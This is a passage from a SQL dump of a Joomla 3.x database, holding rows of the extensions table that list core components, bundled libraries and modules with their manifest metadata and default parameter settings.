00:00:00',0,0),(24,'com_redirect','component','com_redirect','',1,1,0,1,'{\"name\":\"com_redirect\",\"type\":\"component\",\"creationDate\":\"April 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2014 Open Source Matters. All rights reserved.\\t\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"COM_REDIRECT_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(25,'com_users','component','com_users','',1,1,0,1,'{\"name\":\"com_users\",\"type\":\"component\",\"creationDate\":\"April 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2014 Open Source Matters. All rights reserved.\\t\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"COM_USERS_XML_DESCRIPTION\",\"group\":\"\"}','{\"allowUserRegistration\":\"1\",\"new_usertype\":\"2\",\"guest_usergroup\":\"9\",\"sendpassword\":\"1\",\"useractivation\":\"1\",\"mail_to_admin\":\"0\",\"captcha\":\"\",\"frontend_userparams\":\"1\",\"site_language\":\"0\",\"change_login_name\":\"0\",\"reset_count\":\"10\",\"reset_time\":\"1\",\"minimum_length\":\"4\",\"minimum_integers\":\"0\",\"minimum_symbols\":\"0\",\"minimum_uppercase\":\"0\",\"save_history\":\"1\",\"history_limit\":5,\"mailSubjectPrefix\":\"\",\"mailBodySuffix\":\"\"}','','',0,'0000-00-00 00:00:00',0,0),(27,'com_finder','component','com_finder','',1,1,0,0,'{\"name\":\"com_finder\",\"type\":\"component\",\"creationDate\":\"August 2011\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"COM_FINDER_XML_DESCRIPTION\",\"group\":\"\"}','{\"show_description\":\"1\",\"description_length\":255,\"allow_empty_query\":\"0\",\"show_url\":\"1\",\"show_advanced\":\"1\",\"expand_advanced\":\"0\",\"show_date_filters\":\"0\",\"highlight_terms\":\"1\",\"opensearch_name\":\"\",\"opensearch_description\":\"\",\"batch_size\":\"50\",\"memory_table_limit\":30000,\"title_multiplier\":\"1.7\",\"text_multiplier\":\"0.7\",\"meta_multiplier\":\"1.2\",\"path_multiplier\":\"2.0\",\"misc_multiplier\":\"0.3\",\"stemmer\":\"snowball\"}','','',0,'0000-00-00 00:00:00',0,0),(28,'com_joomlaupdate','component','com_joomlaupdate','',1,1,0,1,'{\"name\":\"com_joomlaupdate\",\"type\":\"component\",\"creationDate\":\"February 2012\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2014 Open Source Matters. All rights reserved.\\t\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"COM_JOOMLAUPDATE_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(29,'com_tags','component','com_tags','',1,1,1,1,'{\"name\":\"com_tags\",\"type\":\"component\",\"creationDate\":\"December 2013\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.1.0\",\"description\":\"COM_TAGS_XML_DESCRIPTION\",\"group\":\"\"}','{\"tag_layout\":\"_:default\",\"save_history\":\"1\",\"history_limit\":5,\"show_tag_title\":\"0\",\"tag_list_show_tag_image\":\"0\",\"tag_list_show_tag_description\":\"0\",\"tag_list_image\":\"\",\"show_tag_num_items\":\"0\",\"tag_list_orderby\":\"title\",\"tag_list_orderby_direction\":\"ASC\",\"show_headings\":\"0\",\"tag_list_show_date\":\"0\",\"tag_list_show_item_image\":\"0\",\"tag_list_show_item_description\":\"0\",\"tag_list_item_maximum_characters\":0,\"return_any_or_all\":\"1\",\"include_children\":\"0\",\"maximum\":200,\"tag_list_language_filter\":\"all\",\"tags_layout\":\"_:default\",\"all_tags_orderby\":\"title\",\"all_tags_orderby_direction\":\"ASC\",\"all_tags_show_tag_image\":\"0\",\"all_tags_show_tag_descripion\":\"0\",\"all_tags_tag_maximum_characters\":20,\"all_tags_show_tag_hits\":\"0\",\"filter_field\":\"1\",\"show_pagination_limit\":\"1\",\"show_pagination\":\"2\",\"show_pagination_results\":\"1\",\"tag_field_ajax_mode\":\"1\",\"show_feed_link\":\"1\"}','','',0,'0000-00-00 00:00:00',0,0),(30,'com_contenthistory','component','com_contenthistory','',1,1,1,0,'{\"name\":\"com_contenthistory\",\"type\":\"component\",\"creationDate\":\"May 2013\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.2.0\",\"description\":\"COM_CONTENTHISTORY_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(31,'com_ajax','component','com_ajax','',1,1,1,0,'{\"name\":\"com_ajax\",\"type\":\"component\",\"creationDate\":\"August 2013\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.2.0\",\"description\":\"COM_AJAX_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(32,'com_postinstall','component','com_postinstall','',1,1,1,1,'{\"name\":\"com_postinstall\",\"type\":\"component\",\"creationDate\":\"September 2013\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.2.0\",\"description\":\"COM_POSTINSTALL_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(100,'PHPMailer','library','phpmailer','',0,1,1,1,'{\"name\":\"PHPMailer\",\"type\":\"library\",\"creationDate\":\"2001\",\"author\":\"PHPMailer\",\"copyright\":\"(c) 2001-2003, Brent R. Matzelle, (c) 2004-2009, Andy Prevost. All Rights Reserved., (c) 2010-2013, Jim Jagielski. All Rights Reserved.\",\"authorEmail\":\"jimjag@gmail.com\",\"authorUrl\":\"https:\\/\\/github.com\\/PHPMailer\\/PHPMailer\",\"version\":\"5.2.6\",\"description\":\"LIB_PHPMAILER_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(101,'SimplePie','library','simplepie','',0,1,1,1,'{\"name\":\"SimplePie\",\"type\":\"library\",\"creationDate\":\"2004\",\"author\":\"SimplePie\",\"copyright\":\"Copyright (c) 2004-2009, Ryan Parman and Geoffrey Sneddon\",\"authorEmail\":\"\",\"authorUrl\":\"http:\\/\\/simplepie.org\\/\",\"version\":\"1.2\",\"description\":\"LIB_SIMPLEPIE_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(102,'phputf8','library','phputf8','',0,1,1,1,'{\"name\":\"phputf8\",\"type\":\"library\",\"creationDate\":\"2006\",\"author\":\"Harry Fuecks\",\"copyright\":\"Copyright various authors\",\"authorEmail\":\"hfuecks@gmail.com\",\"authorUrl\":\"http:\\/\\/sourceforge.net\\/projects\\/phputf8\",\"version\":\"0.5\",\"description\":\"LIB_PHPUTF8_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(103,'Joomla! Platform','library','joomla','',0,1,1,1,'{\"name\":\"Joomla! Platform\",\"type\":\"library\",\"creationDate\":\"2008\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"http:\\/\\/www.joomla.org\",\"version\":\"13.1\",\"description\":\"LIB_JOOMLA_XML_DESCRIPTION\",\"group\":\"\"}','{\"mediaversion\":\"9e53933e69beb4a48a3780807cade73d\"}','','',0,'0000-00-00 00:00:00',0,0),(104,'IDNA Convert','library','idna_convert','',0,1,1,1,'{\"name\":\"IDNA Convert\",\"type\":\"library\",\"creationDate\":\"2004\",\"author\":\"phlyLabs\",\"copyright\":\"2004-2011 phlyLabs Berlin, http:\\/\\/phlylabs.de\",\"authorEmail\":\"phlymail@phlylabs.de\",\"authorUrl\":\"http:\\/\\/phlylabs.de\",\"version\":\"0.8.0\",\"description\":\"LIB_IDNA_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(105,'FOF','library','fof','',0,1,1,1,'{\"name\":\"FOF\",\"type\":\"library\",\"creationDate\":\"2014-03-09 12:54:48\",\"author\":\"Nicholas K. Dionysopoulos \\/ Akeeba Ltd\",\"copyright\":\"(C)2011-2014 Nicholas K. Dionysopoulos\",\"authorEmail\":\"nicholas@akeebabackup.com\",\"authorUrl\":\"https:\\/\\/www.akeebabackup.com\",\"version\":\"2.2.1\",\"description\":\"LIB_FOF_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(106,'PHPass','library','phpass','',0,1,1,1,'{\"name\":\"PHPass\",\"type\":\"library\",\"creationDate\":\"2004-2006\",\"author\":\"Solar Designer\",\"copyright\":\"\",\"authorEmail\":\"solar@openwall.com\",\"authorUrl\":\"http:\\/\\/www.openwall.com\\/phpass\\/\",\"version\":\"0.3\",\"description\":\"LIB_PHPASS_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(200,'mod_articles_archive','module','mod_articles_archive','',0,1,1,0,'{\"name\":\"mod_articles_archive\",\"type\":\"module\",\"creationDate\":\"July 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_ARTICLES_ARCHIVE_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(201,'mod_articles_latest','module','mod_articles_latest','',0,1,1,0,'{\"name\":\"mod_articles_latest\",\"type\":\"module\",\"creationDate\":\"July 2004\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_LATEST_NEWS_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(202,'mod_articles_popular','module','mod_articles_popular','',0,1,1,0,'{\"name\":\"mod_articles_popular\",\"type\":\"module\",\"creationDate\":\"July 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_POPULAR_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(203,'mod_banners','module','mod_banners','',0,1,1,0,'{\"name\":\"mod_banners\",\"type\":\"module\",\"creationDate\":\"July 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_BANNERS_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(204,'mod_breadcrumbs','module','mod_breadcrumbs','',0,1,1,1,'{\"name\":\"mod_breadcrumbs\",\"type\":\"module\",\"creationDate\":\"July 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_BREADCRUMBS_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(205,'mod_custom','module','mod_custom','',0,1,1,1,'{\"name\":\"mod_custom\",\"type\":\"module\",\"creationDate\":\"July 2004\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_CUSTOM_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(206,'mod_feed','module','mod_feed','',0,1,1,0,'{\"name\":\"mod_feed\",\"type\":\"module\",\"creationDate\":\"July 2005\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_FEED_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(207,'mod_footer','module','mod_footer','',0,1,1,0,'{\"name\":\"mod_footer\",\"type\":\"module\",\"creationDate\":\"July 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_FOOTER_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(208,'mod_login','module','mod_login','',0,1,1,1,'{\"name\":\"mod_login\",\"type\":\"module\",\"creationDate\":\"July 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_LOGIN_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(209,'mod_menu','module','mod_menu','',0,1,1,1,'{\"name\":\"mod_menu\",\"type\":\"module\",\"creationDate\":\"July 2004\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_MENU_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(210,'mod_articles_news','module','mod_articles_news','',0,1,1,0,'{\"name\":\"mod_articles_news\",\"type\":\"module\",\"creationDate\":\"July 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_ARTICLES_NEWS_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(211,'mod_random_image','module','mod_random_image','',0,1,1,0,'{\"name\":\"mod_random_image\",\"type\":\"module\",\"creationDate\":\"July 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_RANDOM_IMAGE_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(212,'mod_related_items','module','mod_related_items','',0,1,1,0,'{\"name\":\"mod_related_items\",\"type\":\"module\",\"creationDate\":\"July 2004\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_RELATED_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(213,'mod_search','module','mod_search','',0,1,1,0,'{\"name\":\"mod_search\",\"type\":\"module\",\"creationDate\":\"July 2004\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_SEARCH_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(214,'mod_stats','module','mod_stats','',0,1,1,0,'{\"name\":\"mod_stats\",\"type\":\"module\",\"creationDate\":\"July 2004\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_STATS_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(215,'mod_syndicate','module','mod_syndicate','',0,1,1,1,'{\"name\":\"mod_syndicate\",\"type\":\"module\",\"creationDate\":\"May 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_SYNDICATE_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(216,'mod_users_latest','module','mod_users_latest','',0,1,1,0,'{\"name\":\"mod_users_latest\",\"type\":\"module\",\"creationDate\":\"December 2009\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_USERS_LATEST_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(217,'mod_weblinks','module','mod_weblinks','',0,1,1,0,'{\"name\":\"mod_weblinks\",\"type\":\"module\",\"creationDate\":\"July 2009\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_WEBLINKS_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(218,'mod_whosonline','module','mod_whosonline','',0,1,1,0,'{\"name\":\"mod_whosonline\",\"type\":\"module\",\"creationDate\":\"July 2004\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_WHOSONLINE_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(219,'mod_wrapper','module','mod_wrapper','',0,1,1,0,'{\"name\":\"mod_wrapper\",\"type\":\"module\",\"creationDate\":\"October 2004\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_WRAPPER_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(220,'mod_articles_category','module','mod_articles_category','',0,1,1,0,'{\"name\":\"mod_articles_category\",\"type\":\"module\",\"creationDate\":\"February 2010\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_ARTICLES_CATEGORY_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(221,'mod_articles_categories','module','mod_articles_categories','',0,1,1,0,'{\"name\":\"mod_articles_categories\",\"type\":\"module\",\"creationDate\":\"February 2010\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_ARTICLES_CATEGORIES_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(222,'mod_languages','module','mod_languages','',0,1,1,1,'{\"name\":\"mod_languages\",\"type\":\"module\",\"creationDate\":\"February 2010\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_LANGUAGES_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(223,'mod_finder','module','mod_finder','',0,1,0,0,'{\"name\":\"mod_finder\",\"type\":\"module\",\"creationDate\":\"August 2011\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_FINDER_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(300,'mod_custom','module','mod_custom','',1,1,1,1,'{\"name\":\"mod_custom\",\"type\":\"module\",\"creationDate\":\"July 2004\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_CUSTOM_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(301,'mod_feed','module','mod_feed','',1,1,1,0,'{\"name\":\"mod_feed\",\"type\":\"module\",\"creationDate\":\"July 2005\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_FEED_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(302,'mod_latest','module','mod_latest','',1,1,1,0,'{\"name\":\"mod_latest\",\"type\":\"module\",\"creationDate\":\"July 2004\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_LATEST_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(303,'mod_logged','module','mod_logged','',1,1,1,0,'{\"name\":\"mod_logged\",\"type\":\"module\",\"creationDate\":\"January 2005\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_LOGGED_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(304,'mod_login','module','mod_login','',1,1,1,1,'{\"name\":\"mod_login\",\"type\":\"module\",\"creationDate\":\"March 2005\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_LOGIN_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(305,'mod_menu','module','mod_menu','',1,1,1,0,'{\"name\":\"mod_menu\",\"type\":\"module\",\"creationDate\":\"March 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_MENU_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(307,'mod_popular','module','mod_popular','',1,1,1,0,'{\"name\":\"mod_popular\",\"type\":\"module\",\"creationDate\":\"July 2004\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_POPULAR_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(308,'mod_quickicon','module','mod_quickicon','',1,1,1,1,'{\"name\":\"mod_quickicon\",\"type\":\"module\",\"creationDate\":\"Nov 2005\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_QUICKICON_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(309,'mod_status','module','mod_status','',1,1,1,0,'{\"name\":\"mod_status\",\"type\":\"module\",\"creationDate\":\"Feb 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_STATUS_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(310,'mod_submenu','module','mod_submenu','',1,1,1,0,'{\"name\":\"mod_submenu\",\"type\":\"module\",\"creationDate\":\"Feb 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_SUBMENU_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(311,'mod_title','module','mod_title','',1,1,1,0,'{\"name\":\"mod_title\",\"type\":\"module\",\"creationDate\":\"Nov 2005\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_TITLE_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(312,'mod_toolbar','module','mod_toolbar','',1,1,1,1,'{\"name\":\"mod_toolbar\",\"type\":\"module\",\"creationDate\":\"Nov 2005\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_TOOLBAR_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(313,'mod_multilangstatus','module','mod_multilangstatus','',1,1,1,0,'{\"name\":\"mod_multilangstatus\",\"type\":\"module\",\"creationDate\":\"September 2011\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_MULTILANGSTATUS_XML_DESCRIPTION\",\"group\":\"\"}','{\"cache\":\"0\"}','','',0,'0000-00-00 00:00:00',0,0),(314,'mod_version','module','mod_version','',1,1,1,0,'{\"name\":\"mod_version\",\"type\":\"module\",\"creationDate\":\"January 2012\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_VERSION_XML_DESCRIPTION\",\"group\":\"\"}','{\"format\":\"short\",\"product\":\"1\",\"cache\":\"0\"}','','',0,'0000-00-00 00:00:00',0,0),(315,'mod_stats_admin','module','mod_stats_admin','',1,1,1,0,'{\"name\":\"mod_stats_admin\",\"type\":\"module\",\"creationDate\":\"July 2004\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_STATS_XML_DESCRIPTION\",\"group\":\"\"}','{\"serverinfo\":\"0\",\"siteinfo\":\"0\",\"counter\":\"0\",\"increase\":\"0\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"static\"}','','',0,'0000-00-00 00:00:00',0,0),(316,'mod_tags_popular','module','mod_tags_popular','',0,1,1,0,'{\"name\":\"mod_tags_popular\",\"type\":\"module\",\"creationDate\":\"January 2013\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2014 Open Source Matters. All rights 